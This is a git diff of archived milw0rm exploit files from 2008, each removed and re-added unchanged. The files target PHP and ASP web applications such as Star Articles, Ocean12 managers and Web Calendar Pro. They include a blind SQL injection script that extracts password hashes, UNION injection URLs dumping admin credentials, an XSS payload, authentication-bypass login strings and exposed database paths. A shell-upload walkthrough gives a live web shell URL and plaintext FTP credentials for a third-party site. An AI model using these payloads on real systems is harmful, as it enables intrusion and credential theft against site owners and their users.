-for ($j = 1; $j <= 32; $j++) {
-   for ($i = 46; $i <= 102; $i=$i+2) {
-      if ($i == 60) {
-         $i = 98;
-      }
-      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+myart_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i.""));
-      if (abs((100-($laenge/$r*100))) > $t-1) {
-         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+myart_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
-         if (abs((100-($laenge/$r*100))) > $t-1) {
-            echo chr($i-1);
-         } else {
-            echo chr($i);
-         }
-         $i = 102;
-      }
-   }
-}
-} else {
-echo "\nExploiting failed: By Stack\n";
-}
-?>
-
-# milw0rm.com [2008-11-27]
+<?php
+	/*         ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+        +                                                                               +
+        +            stararticles blind sql injection Vulnerability  xpl         +
+        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+AUTHOR : Mountassif Moad
+DATE   : 26 nov 2008
+#####################################################
+APPLICATION   : stararticles
+DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5
+VENDOR        : http://www.stararticles.com/
+DEMO          : http://www.kalptarudemos.com/demo/stararticle/
+DORK          : inurl:"article.download.php"
+#####################################################
+ */
+
+#
+ini_set("max_execution_time",0);
+print_r('
+###############################################################
+#         stararticles Blind SQL Injection Exploit 
+#php '.$argv[0].' "http://www.site.com/article.download.php?artid=36106" 1
+#                                                         
+###############################################################
+');
+if ($argc > 1) {
+$url = $argv[1];
+if ($argc < 3) {
+$userid = 1;
+} else {
+$userid = $argv[2];
+}
+$r = strlen(file_get_contents($url."+and+1=1"));
+echo "\nExploiting:\n";
+$w = strlen(file_get_contents($url."+and+1=0"));
+$t = abs((100-($w/$r*100)));
+echo "\nPassword: ";
+for ($j = 1; $j <= 32; $j++) {
+   for ($i = 46; $i <= 102; $i=$i+2) {
+      if ($i == 60) {
+         $i = 98;
+      }
+      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+myart_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i.""));
+      if (abs((100-($laenge/$r*100))) > $t-1) {
+         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+myart_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
+         if (abs((100-($laenge/$r*100))) > $t-1) {
+            echo chr($i-1);
+         } else {
+            echo chr($i);
+         }
+         $i = 102;
+      }
+   }
+}
+} else {
+echo "\nExploiting failed: By Stack\n";
+}
+?>
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7244.txt b/platforms/php/webapps/7244.txt
index d3e7a58e0..be1745de4 100755
--- a/platforms/php/webapps/7244.txt
+++ b/platforms/php/webapps/7244.txt
@@ -1,23 +1,23 @@
-#########################################################
----------------------------------------------------------
-Portal Name: Ocean12 Contact Manager Pro
-Version : 1.02
-Vendor : http://ocean12tech.com/products/contact
-Dork: Maintained with the Ocean12 Contact Manager Pro v1.02
-Author : Pouya_Server , Pouya.s3rver@Gmail.com
-Vulnerability : (DDV,XSS,SQL)
----------------------------------------------------------
-#########################################################
-[SQL]:
-http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]
- 
-[Database Disclosure Vulnerability]:
-http://site.com/path/o12con.mdb
- 
-[XSS]:
-http://site.com/path/?DisplayFormat=>"><ScRiPt>alert(1369)%3B</ScRiPt>&Action=Pouya_Server
----------------------------------
-Victem :
-http://ocean12tech.com/products/contact/demo
-
-# milw0rm.com [2008-11-27]
+#########################################################
+---------------------------------------------------------
+Portal Name: Ocean12 Contact Manager Pro
+Version : 1.02
+Vendor : http://ocean12tech.com/products/contact
+Dork: Maintained with the Ocean12 Contact Manager Pro v1.02
+Author : Pouya_Server , Pouya.s3rver@Gmail.com
+Vulnerability : (DDV,XSS,SQL)
+---------------------------------------------------------
+#########################################################
+[SQL]:
+http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]
+ 
+[Database Disclosure Vulnerability]:
+http://site.com/path/o12con.mdb
+ 
+[XSS]:
+http://site.com/path/?DisplayFormat=>"><ScRiPt>alert(1369)%3B</ScRiPt>&Action=Pouya_Server
+---------------------------------
+Victem :
+http://ocean12tech.com/products/contact/demo
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7245.txt b/platforms/php/webapps/7245.txt
index 349600fe9..2d9d97bc5 100755
--- a/platforms/php/webapps/7245.txt
+++ b/platforms/php/webapps/7245.txt
@@ -1,15 +1,15 @@
-#########################################################
----------------------------------------------------------
-Portal Name: Ocean12 Membership Manager Pro
-Vendor : http://ocean12tech.com/products/membership
-Dork: ©2005 Ocean12 Technologies. All rights reserved
-Author : Pouya_Server , Pouya.s3rver@Gmail.com
-Vulnerability : Database Disclosure Vulnerability
----------------------------------------------------------
-#########################################################
-http://ocean12tech.com/path/o12member.mdb
----------------------------------
-Victem :
-http://ocean12tech.com/products/membership/demo
-
-# milw0rm.com [2008-11-27]
+#########################################################
+---------------------------------------------------------
+Portal Name: Ocean12 Membership Manager Pro
+Vendor : http://ocean12tech.com/products/membership
+Dork: ©2005 Ocean12 Technologies. All rights reserved
+Author : Pouya_Server , Pouya.s3rver@Gmail.com
+Vulnerability : Database Disclosure Vulnerability
+---------------------------------------------------------
+#########################################################
+http://ocean12tech.com/path/o12member.mdb
+---------------------------------
+Victem :
+http://ocean12tech.com/products/membership/demo
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7246.txt b/platforms/php/webapps/7246.txt
index 7cf0c4b2b..5adaef87d 100755
--- a/platforms/php/webapps/7246.txt
+++ b/platforms/php/webapps/7246.txt
@@ -1,17 +1,17 @@
-#########################################################
----------------------------------------------------------
-Portal Name: Ocean12 Poll Manager Pro
-Version: 1.00
-Vendor : http://ocean12tech.com/products/poll
-Dork: Maintained with the Ocean12 Poll Manager Pro v1.00
-Author : Pouya_Server , Pouya.s3rver@Gmail.com
-Vulnerability : Database Disclosure Vulnerability
----------------------------------------------------------
-#########################################################
-http://site.com/path/o12poll.mdb
-
----------------------------------
-Victem :
-http://ocean12tech.com/products/poll/demo
-
-# milw0rm.com [2008-11-27]
+#########################################################
+---------------------------------------------------------
+Portal Name: Ocean12 Poll Manager Pro
+Version: 1.00
+Vendor : http://ocean12tech.com/products/poll
+Dork: Maintained with the Ocean12 Poll Manager Pro v1.00
+Author : Pouya_Server , Pouya.s3rver@Gmail.com
+Vulnerability : Database Disclosure Vulnerability
+---------------------------------------------------------
+#########################################################
+http://site.com/path/o12poll.mdb
+
+---------------------------------
+Victem :
+http://ocean12tech.com/products/poll/demo
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7247.txt b/platforms/php/webapps/7247.txt
index bfdd6a14d..f8a7c5c8f 100755
--- a/platforms/php/webapps/7247.txt
+++ b/platforms/php/webapps/7247.txt
@@ -1,17 +1,17 @@
-#########################################################
----------------------------------------------------------
-Portal Name: Ocean12 Calendar Manager Gold
-Version: 2.04
-Vendor : http://ocean12tech.com/products/o12calgold
-Dork: Maintained with the Ocean12 Calendar Manager Gold v2.04
-Author : Pouya_Server , Pouya.s3rver@Gmail.com
-Vulnerability : Database Disclosure Vulnerability
----------------------------------------------------------
-#########################################################
-http://site.com/path/o12cal.mdb
-
----------------------------------
-Victem :
-http://ocean12tech.com/products/o12calgold/demo
-
-# milw0rm.com [2008-11-27]
+#########################################################
+---------------------------------------------------------
+Portal Name: Ocean12 Calendar Manager Gold
+Version: 2.04
+Vendor : http://ocean12tech.com/products/o12calgold
+Dork: Maintained with the Ocean12 Calendar Manager Gold v2.04
+Author : Pouya_Server , Pouya.s3rver@Gmail.com
+Vulnerability : Database Disclosure Vulnerability
+---------------------------------------------------------
+#########################################################
+http://site.com/path/o12cal.mdb
+
+---------------------------------
+Victem :
+http://ocean12tech.com/products/o12calgold/demo
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7248.txt b/platforms/php/webapps/7248.txt
index 169e33f85..4d4cad88d 100755
--- a/platforms/php/webapps/7248.txt
+++ b/platforms/php/webapps/7248.txt
@@ -1,26 +1,26 @@
---------------------------------------Mor0ccan nightamres---------------------------------------------
-Script     : familyproject
-
-V3rs!0n    : 2.0
-
-Download   : http://www.mjcreation.fr/familyproject/
-
-Auth0r    : The_5p3ctrum
------------------------------------------------------------------------------------
-
-demo Exploit    :
-
-http://www.mjcreation.fr/familyproject/demo/index.php
-
-login : ' or 1=1 or 'r
-pass  : ' or 1=1 or 'r
-
------------------------------------------------------------------------------------
-
-Greets :
-
-str0ke  ,  Bayhay  ,  Cyber-Zone  , Mor0ccan nightamres
-
------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-27]
+--------------------------------------Mor0ccan nightamres---------------------------------------------
+Script     : familyproject
+
+V3rs!0n    : 2.0
+
+Download   : http://www.mjcreation.fr/familyproject/
+
+Auth0r    : The_5p3ctrum
+-----------------------------------------------------------------------------------
+
+demo Exploit    :
+
+http://www.mjcreation.fr/familyproject/demo/index.php
+
+login : ' or 1=1 or 'r
+pass  : ' or 1=1 or 'r
+
+-----------------------------------------------------------------------------------
+
+Greets :
+
+str0ke  ,  Bayhay  ,  Cyber-Zone  , Mor0ccan nightamres
+
+-----------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/725.pl b/platforms/php/webapps/725.pl
index 6b7c9710b..d4f1c4dda 100755
--- a/platforms/php/webapps/725.pl
+++ b/platforms/php/webapps/725.pl
@@ -217,6 +217,6 @@ if ($hot[$q] =~/http/)
 $tipo=get($hot[$q]) or next;
 }}
 }
-}
-
-# milw0rm.com [2004-12-25]
+}
+
+# milw0rm.com [2004-12-25]
diff --git a/platforms/php/webapps/7250.txt b/platforms/php/webapps/7250.txt
index cf08868b6..6cb135da9 100755
--- a/platforms/php/webapps/7250.txt
+++ b/platforms/php/webapps/7250.txt
@@ -1,31 +1,31 @@
-[â– ] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection
- 
->@.@<
-
-> AuToR: XaDoS
-> Contact M&: xados [at] hotmail [dot] it
-> B§g: Remote Sql inJection
-> SIte vuln: http://willscript.com/rjbike_new/index.php
- 
->@.@<
- 
-
- 
-[â– ] ExPL0iT:
- 
-|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL]
- 
- 
- 
-[■] D£M0:  
- 
-|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--
- 
-(you see the username and password of adm in the title of one product)
- 
-[â– ] Th4nKs::
- 
-\> str0ke </
-\> OnlY me ( no help for this ) ;-) </
-
-# milw0rm.com [2008-11-27]
+[â– ] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection
+ 
+>@.@<
+
+> AuToR: XaDoS
+> Contact M&: xados [at] hotmail [dot] it
+> B§g: Remote Sql inJection
+> SIte vuln: http://willscript.com/rjbike_new/index.php
+ 
+>@.@<
+ 
+
+ 
+[â– ] ExPL0iT:
+ 
+|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL]
+ 
+ 
+ 
+[■] D£M0:  
+ 
+|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--
+ 
+(you see the username and password of adm in the title of one product)
+ 
+[â– ] Th4nKs::
+ 
+\> str0ke </
+\> OnlY me ( no help for this ) ;-) </
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7251.txt b/platforms/php/webapps/7251.txt
index 2cdb49590..c400b07b3 100755
--- a/platforms/php/webapps/7251.txt
+++ b/platforms/php/webapps/7251.txt
@@ -1,78 +1,78 @@
-[~] Star Articles 6.0 Remote File Upload
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] dork: allinurl:"article.download.php"   ( baya bi site var )
-[~]
-[~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica )
-[~] -----------------------------------------------------------
-
-expl:
-
-http://script//authorphoto/user_name[id].php
-
-example:
-
-http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )
-
-http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )
-
-hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal:
-
-http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
-
-bir cok site var. ya rootlayýn yada tek tek cakýn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;) 
-
-http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
-
-bu serverdaki bir site icin:
-
-ftp://ftp.ababy.com.au/  ( ftp pass ve username )
-
-user: kiddybab
-
-pass: KidEw1nk08
-
-ne biliyim iste biseler yapmaya calIsIn amacIm yardImcý olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)
-
-
-first register for site
-
-after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )
-
-click to gozat button and select your shell after upload you shell
-
-more after go repat edit profile page and you look you photo. right click to you photo
-
-select to properties copy photo link and paste you explorer.
-
-go your shell
-
-examp:
-
-user: trt-turk@hotmail.com
-
-passwd: zorlu1
-
-login: 
-
-http://www.lcfarticles.com/user.login.php
-
-shell:
-
-http://www.lcfarticles.com//authorphoto/zorlu40.php
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & RedHaK
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-27]
+[~] Star Articles 6.0 Remote File Upload
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] dork: allinurl:"article.download.php"   ( baya bi site var )
+[~]
+[~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica )
+[~] -----------------------------------------------------------
+
+expl:
+
+http://script//authorphoto/user_name[id].php
+
+example:
+
+http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )
+
+http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )
+
+hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal:
+
+http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
+
+bir cok site var. ya rootlayýn yada tek tek cakýn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;) 
+
+http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
+
+bu serverdaki bir site icin:
+
+ftp://ftp.ababy.com.au/  ( ftp pass ve username )
+
+user: kiddybab
+
+pass: KidEw1nk08
+
+ne biliyim iste biseler yapmaya calIsIn amacIm yardImcý olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)
+
+
+first register for site
+
+after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )
+
+click to gozat button and select your shell after upload you shell
+
+more after go repat edit profile page and you look you photo. right click to you photo
+
+select to properties copy photo link and paste you explorer.
+
+go your shell
+
+examp:
+
+user: trt-turk@hotmail.com
+
+passwd: zorlu1
+
+login: 
+
+http://www.lcfarticles.com/user.login.php
+
+shell:
+
+http://www.lcfarticles.com//authorphoto/zorlu40.php
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & RedHaK
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7252.txt b/platforms/php/webapps/7252.txt
index ccf473e2d..75d576055 100755
--- a/platforms/php/webapps/7252.txt
+++ b/platforms/php/webapps/7252.txt
@@ -1,70 +1,70 @@
-***********************************************************************************************************************************************************        
-[!]                                                                                                                                                     [!]
-[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
-[!]                                 O    O            O                                 O      O                                                        [!]
-[!]                                 O                 O                                       O                                                         [!]
-[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
-[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
-[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
-[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
-[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
-[!]                                           OO                                                                                                        [!]
-[!]                                          OO                                                                                                         [!]
-[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
-[!]                                        OO                WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM                                    [!]
-***********************************************************************************************************************************************************
-+----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++                                       [ Web Calendar Pro 4.1 (Auth Bypass) SQL Injection Vulnerability ]                                              ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
-¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
-¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
-¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
-¦   Script   : http://www.web-calendar-pro.com                                                            ¦       ¦                ![ ]!                  ¦
-¦   Download : http://www.web-calendar-pro.com/order-now.html                                             ¦       ¦                                       ¦
-¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
-¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
-¦                                                          From The Dark Side Of MoroCCo                                                                 ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:                                                                                                                                                         :
-¦  Remember    :                                                                                                                                          ¦
-¦  -------------                                                                                                                                          ¦
-¦                                                                                                                                                         ¦
-¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
-¦                                                                                                                                                         ¦
-
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!]              ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-
-
-This is a simple (Auth Bypass) :)
-
-just login with this informations :
-
-Username : admin ' or ' 1=1
-Password : Cyber-Zone or any thing
-
-This is a demo To Try :
-
-http://demo.web-calendar-pro.com/admin.php
-
-
-Yeaaaaaaaaaaaah Loged In :)
-
-Fi Khater Alfarkha dyali :)
-
-Raha Nayda Nooood
-
-
-
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-+----                                                                  ThanX To                                                                       ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-=                                                                    [AttaCk Is CompLet]                                                                  =
-___________________________________________________________________________________________________________________________________________________________
-
-# milw0rm.com [2008-11-27]
+***********************************************************************************************************************************************************        
+[!]                                                                                                                                                     [!]
+[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
+[!]                                 O    O            O                                 O      O                                                        [!]
+[!]                                 O                 O                                       O                                                         [!]
+[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
+[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
+[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
+[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
+[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
+[!]                                           OO                                                                                                        [!]
+[!]                                          OO                                                                                                         [!]
+[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
+[!]                                        OO                WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM                                    [!]
+***********************************************************************************************************************************************************
++----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++                                       [ Web Calendar Pro 4.1 (Auth Bypass) SQL Injection Vulnerability ]                                              ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
+¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
+¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
+¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
+¦   Script   : http://www.web-calendar-pro.com                                                            ¦       ¦                ![ ]!                  ¦
+¦   Download : http://www.web-calendar-pro.com/order-now.html                                             ¦       ¦                                       ¦
+¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
+¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
+¦                                                          From The Dark Side Of MoroCCo                                                                 ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:                                                                                                                                                         :
+¦  Remember    :                                                                                                                                          ¦
+¦  -------------                                                                                                                                          ¦
+¦                                                                                                                                                         ¦
+¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
+¦                                                                                                                                                         ¦
+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!]              ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+
+
+This is a simple (Auth Bypass) :)
+
+just login with this informations :
+
+Username : admin ' or ' 1=1
+Password : Cyber-Zone or any thing
+
+This is a demo To Try :
+
+http://demo.web-calendar-pro.com/admin.php
+
+
+Yeaaaaaaaaaaaah Loged In :)
+
+Fi Khater Alfarkha dyali :)
+
+Raha Nayda Nooood
+
+
+
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
++----                                                                  ThanX To                                                                       ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+=                                                                    [AttaCk Is CompLet]                                                                  =
+___________________________________________________________________________________________________________________________________________________________
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7253.txt b/platforms/php/webapps/7253.txt
index a5fd10706..37f77832e 100755
--- a/platforms/php/webapps/7253.txt
+++ b/platforms/php/webapps/7253.txt
@@ -1,38 +1,38 @@
- [~] ----------------------------بسم الله الرحمن الرحيم------------------------------
- [~]Tybe: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability
-  
- [~]Vendor: www.bookingcentre.eu
-  
- [~]Software: Hotels Group
-  
- [~]author: ((я3d D3v!L)) 
-  
- [~] Date: 28.11.2008 
-  
- [~] Home: www.ahacker.biz 
-  
- [~] contact: N/A 
- [~] ----------------------------------------------------------- 
-  
-
- [~] Exploit: 
-
- http://demo.hotelsadmin.com/www_en/hotel_habitaciones.php?HotelID=(SQL)
-
-
- [~] (SQL): 
-
- 1+union+select+concat_ws(0x3a,@@version,0x3a,user())--
-  
- [~]-------------------------------------------------------------------------------- 
- [~] Greetz tO: keta & m4n0n & maxmos & EV!L KS@ & hesham_hacker 
- [~] 
- [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري 
- [~] 
- [~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion --samakiller
- [~] 
- [~] xp10.biz & ahacker.biz
- [~] 
- [~]--------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-27]
+ [~] ----------------------------بسم الله الرحمن الرحيم------------------------------
+ [~]Tybe: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability
+  
+ [~]Vendor: www.bookingcentre.eu
+  
+ [~]Software: Hotels Group
+  
+ [~]author: ((я3d D3v!L)) 
+  
+ [~] Date: 28.11.2008 
+  
+ [~] Home: www.ahacker.biz 
+  
+ [~] contact: N/A 
+ [~] ----------------------------------------------------------- 
+  
+
+ [~] Exploit: 
+
+ http://demo.hotelsadmin.com/www_en/hotel_habitaciones.php?HotelID=(SQL)
+
+
+ [~] (SQL): 
+
+ 1+union+select+concat_ws(0x3a,@@version,0x3a,user())--
+  
+ [~]-------------------------------------------------------------------------------- 
+ [~] Greetz tO: keta & m4n0n & maxmos & EV!L KS@ & hesham_hacker 
+ [~] 
+ [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري 
+ [~] 
+ [~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion --samakiller
+ [~] 
+ [~] xp10.biz & ahacker.biz
+ [~] 
+ [~]--------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7254.txt b/platforms/php/webapps/7254.txt
index 2b6675be1..10b1d084e 100755
--- a/platforms/php/webapps/7254.txt
+++ b/platforms/php/webapps/7254.txt
@@ -1,68 +1,68 @@
-***********************************************************************************************************************************************************        
-[!]                                                                                                                                                     [!]
-[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
-[!]                                 O    O            O                                 O      O                                                        [!]
-[!]                                 O                 O                                       O                                                         [!]
-[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
-[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
-[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
-[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
-[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
-[!]                                           OO                                                                                                        [!]
-[!]                                          OO                                                                                                         [!]
-[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
-[!]                                        OO                   Mor0ccan nightamres Will Be The Best   The_5p3ctrum , BayHay & Me :)                    [!]
-***********************************************************************************************************************************************************
- +----                                                       Bismi Allah Irahmani ArraHim                                                             ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++                                       [    Ocean12 Membership Manager Pro (Auth Bypass) SQL Injection Vulnerability ]                                   ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:   Author   : Cyber-Zone   ( Abdelkhalek)                                                                :       :                                       :
-¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
-¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
-¦   TeaM     : Mor0ccan nightamres                                                                        ¦       ¦                                       ¦
-¦   Script   : http://ocean12tech.com                                                                     ¦       ¦                ![ ]!                  ¦
-¦   Download : http://ocean12tech.com/products/membership/                                                ¦       ¦                                       ¦
-¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
-¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
-¦                                                          From The Dark Side Of MoroCCo                                                                 ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:                                                                                                                                                         :
-¦  Remember    :                                                                                                                                          ¦
-¦  -------------                                                                                                                                          ¦
-¦                                                                                                                                                         ¦
-¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
-¦                                                                                                                                                         ¦
-
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-
-
-Bypass : ........
-
-Go To The Admin Panel.
-and Login with this information :
-
-username : admin ' or ' 1=1
-password : Cyber-Zone or any thing you want :)
-
-yeah bro you  loged in dont worry :)
-
-and this is a live demo :
-
-http://ocean12tech.com/products/membership/demo/
-
-EnjoY.
-
-
-
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-+----                                                                  ThanX To                                                                       ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
